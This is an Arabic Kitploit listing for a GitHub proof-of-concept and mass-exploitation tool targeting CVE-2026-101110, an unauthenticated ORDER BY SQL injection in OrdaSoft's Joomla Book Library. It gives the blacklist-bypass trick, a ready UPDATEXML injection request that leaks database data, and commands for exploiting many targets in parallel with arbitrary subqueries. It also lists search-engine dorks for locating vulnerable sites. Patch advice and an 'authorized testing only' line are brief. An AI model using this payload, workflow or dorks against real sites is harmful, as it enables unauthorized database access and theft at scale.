Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-101110 — Python 3 PoC واستغلال جماعي لـ CVE-2026-101110، وهو حقن SQL غير مصادق عليه في ORDER BY في OrdaSoft Joomla Book Library <=6.4.6 عبر معاملات field/direction. | Kitploit
أدوات/GitHubGitHub/murrez/cve-2026-101110
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubmurrez/cve-2026-101110

CVE-2026-101110

Python 3 PoC واستغلال جماعي لـ CVE-2026-101110، وهو حقن SQL غير مصادق عليه في ORDER BY في OrdaSoft Joomla Book Library <=6.4.6 عبر معاملات field/direction.

منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-101110 — حقن SQL غير مصادق عليه في OrdaSoft Book Library (الإصدار المجاني)

نموذج إثبات مفاهيم (PoC) بلغة Python 3 لـ CVE-2026-101110 — OrdaSoft Book Library (Free) لنظام Joomla ≤ 6.4.6. قم بالترقية إلى 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
الدليلhttps://pocbit.org/pocs/
المكونcom_booklibrary
الملف / الدالةsite/booklibrary.php → books()
البارامتراتfield، direction (الترتيب)
المصادقةلا توجد (قوائم الكتب العامة)
CWECWE-89 حقن SQL
CVSS 4.09.3 حرجة (Joomla CNA)
الإسنادAla Arfaoui

ملخص الثغرة

يُعد Book Library (Free) إضافة من OrdaSoft تقدم مكتبة كتب وقوائم فئات في نظام Joomla. في الإصدارات 6.4.6 والإصدارات الأقدم، تقوم دالة books() بفلترة بارامترات field و direction باستخدام protectInjectionWithoutQuote(). تطبق هذه الدالة قائمة سوداء ضعيفة تبحث فقط عن السلسلة الفرعية select؛ وعند العثور عليها، تغلف القيمة بـ $db->quote() بدلاً من رفضها.

تُضاف القيم لاحقاً إلى عبارة ORDER BY غير المحاطة بعلامات اقتباس — حيث أن استخدام علامات الاقتباس هنا لا يمنع حقن SQL (وفقاً لشرح CNA).

شرطان مطلوبان للاستغلال:

  1. تمهيد الجلسة: يكتب الطلب الأول قيم الترتيب الافتراضية (field / direction) المخزنة في الجلسة.
  2. تجاوز القائمة السوداء: في الطلب الثاني، يُضاف تعليق زائف -- xselect إلى نهاية الحمولة؛ مما يتجاوز فحص القائمة السوداء، ولا يؤثر تعليق SQL على بقية الحمولة.

النتيجة: ثغرة ORDER BY SQLi بدون مصادقة، تشكل خطراً حقيقياً على قراءة/كتابة قاعدة البيانات وسلامة الموقع.


الآلية التقنية

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

الفلتر الضعيف (مفاهيمي):

  • يحتوي الإدخال على select (سلسلة فرعية) → يتم تغليف القيمة بالكامل بعلامات اقتباس (غير ذي صلة في سياق ORDER BY).
  • يضيف المهاجم -- xselect بحيث ترى القائمة السوداء select داخل ذيل التعليق، بينما يبقى التعبير النشط قبل -- كاستعلام SQL قابل للتنفيذ (خدع استناداً للأخطاء / UPDATEXML / تراكب ORDER BY).

يطبق نموذج PoC ما يلي:

الخطوةالإجراء
بصمة النظاممسارات com_booklibrary + إصدار المانيفست الاختياري
اكتشاف المسارshowCategory، search، showBooks، books، … + catid / Itemid المستخرجة
فحصتمهيد الجلسة → تأكيد ثغرة SQLi (علم / VERSION())
استغلالتمهيد → استخراج --subquery (افتراضي SELECT VERSION())
جماعي--list + -j أهداف متوازية؛ ملف exploited.txt عند نجاح التسريب

ثابت لاحقة الحمولة في الكود: -- xselect (BLACKLIST_DECOY).


المتطلبات

cd CVE-2026-101110
pip install -r requirements.txt

الاستخدام

هدف واحد

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

عمليات جماعية (سير عمل يعتمد الاستغلال أولاً)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
المعلمةالمعنى
--aggressiveيحاول وضع الفحص تسريب الإصدار بعد التمهيد
--subqueryالتعبير الداخلي لحمولات UPDATEXML / الاستعلام المزدوج
--exploited-listالاستخراج الناجح مفصولاً بجدول
--no-colorتعطيل ANSI (أيضاً عبر NO_COLOR)

تنسيق JSONL: pocbit، pocbit_catalog، pocbit_page، cve، component، session_primed.


مثال HTTP

تمهيد (الجلسة):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

الحقن (يضيف نموذج PoC الزائف):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

يتم محاولة متغيرات POST على نفس المسار عند فشل طلب GET.


كشف الإصدار

ملف المانيفست (إذا كان مكشوفاً):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → سطر متأثر بالثغرة؛ ≥ 6.4.7 → مُصلّح (patched_version في مخرجات الفحص).


كلمات بحث FOFA

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

ثغرات CVE ذات الصلة بـ OrdaSoft (سبتمبر 2026)

CVEالامتدادالمشكلةالإصدار المصحح
CVE-2026-101110Book LibraryORDER BY SQLi + تجاوز القائمة السوداء6.4.7
CVE-2026-101111Book LibraryXSS معكوس (بارامتر title)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

قم بإصلاح جميع مكونات OrdaSoft التي تقوم بنشرها.


المراجع

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • تاريخي: ثغرة SQLi أقدم في com_booklibrary ضمن مهام البحث/الإقراض (CVE-2010-1522) — مسارات كود مختلفة

الجانب القانوني

الاختبار المصرح به والتحقق من التصحيحات فقط.


وصف مستودع GitHub

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
تنزيل الأداة